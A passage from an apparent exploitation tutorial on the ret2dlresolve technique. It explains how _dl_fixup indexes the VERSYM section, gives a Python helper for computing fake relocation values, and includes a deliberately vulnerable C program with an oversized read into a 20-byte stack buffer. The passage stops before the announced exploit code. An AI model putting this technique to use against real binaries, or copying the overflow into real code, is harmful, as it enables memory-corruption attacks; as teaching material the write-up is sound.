0x7fd3f92fea8d <_dl_fixup+109>: mov rax,QWORD PTR [r8+0x8]
0x7fd3f92fea91 <_dl_fixup+113>: movzx eax,WORD PTR [rax+rcx*2]
0x7fd3f92fea95 <_dl_fixup+117>: and eax,0x7fff
QWORD PTR [r8+0x8] is a pointer to the VERSYM section and RCX contains 0x1565200000007 >> 32 = 0x15652, so
$rax + $rcx*2 = 0x400356 + 0x15652*2 = 0x42affa
This address lies in an unmapped memory region, so the binary segfaults:
0x42affa: Cannot access memory at address 0x42affa
As we can see from this article, a common workaround is to leak the link_map address and write a NULL pointer at &l + 0x1d0. This way the
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
check is not satisfied and the program skips the code in the “if” statement.
Another very interesting solution comes from this article, but it requires a leak too.
Now let’s assume the .bss is mapped at 0x404000 and we decide to use 0x404700 as our controllable area. The r_info field in the corresponding fake Elf64_Rel structure will again be equal to
(((fake_dynsym - SYMTAB) / 0x18) << 32) | 0x7
which in this case gives
(((0x404768 - 0x400328) / 0x18) << 32) | 0x7 = 0x2d800000007
In
ElfW(Half) ndx = vernum[0x2d800000007 >> 32] & 0x7fff;
the index is 0x2d800000007 >> 32 = 0x2d8, and in:
0x7fd3f92fea8d <_dl_fixup+109>: mov rax,QWORD PTR [r8+0x8]
0x7fd3f92fea91 <_dl_fixup+113>: movzx eax,WORD PTR [rax+rcx*2]
0x7fd3f92fea95 <_dl_fixup+117>: and eax,0x7fff
$rax + $rcx*2 = 0x4003c6 + 0x2d8*2 = 0x400976
results in a valid pointer:
0x400976: 0x0000000000000000
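The difference between the two scenarios comes down to one multiplication, which the following sketch makes explicit. The function name is ours; the fake_dynsym, SYMTAB and VERSYM addresses are the ones used in the two examples above.

```python
ENTRY = 0x18   # sizeof(Elf64_Sym)

def versym_read(fake_dynsym: int, symtab: int, versym: int):
    """Return (r_info, address of the vernum[] element _dl_fixup() will read)."""
    sym_index = (fake_dynsym - symtab) // ENTRY
    r_info = (sym_index << 32) | 0x7
    return r_info, versym + sym_index * 2   # vernum[] holds 2-byte entries

# .bss at 0x601000 versus .bss at 0x404000.
far_info, far_addr = versym_read(0x601A68, 0x4002B8, 0x400356)
near_info, near_addr = versym_read(0x404768, 0x400328, 0x4003C6)

print(hex(far_info), hex(far_addr))
print(hex(near_info), hex(near_addr))
```

The read lands (fake_dynsym - SYMTAB) / 12 bytes past the start of the VERSYM section: roughly 0x2aca4 bytes in the first scenario, far beyond the binary's first mapping, but only 0x5b0 bytes in the second one.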
Together with my friend FizzBuzz101, I ran some tests and we noticed that, with modern GCC versions, the .bss is often mapped at 0x40XXXX; for example with gcc 7.4.0 and 8.3.0 on Debian 10, gcc 9.2.1 on Ubuntu 18.04, gcc 8.4.0 and 9.3.0 on Kali 4, and so on.
Under this condition, we can proceed without needing any workaround.
The vulnerable poc I used for this article is really simple:
#include <unistd.h>
void main(void)
{
char buff[20];
read(0, buff, 0x90);
}
Compiled using gcc 9.3.0:
gcc poc.c -o poc -no-pie
Let’s take a look at the exploit:
As pointed out by FizzBuzz101, we can also avoid pivoting in stage 1: we can create the fake structures in the .bss, call main again and overflow a second time. Here’s his version of the exploit: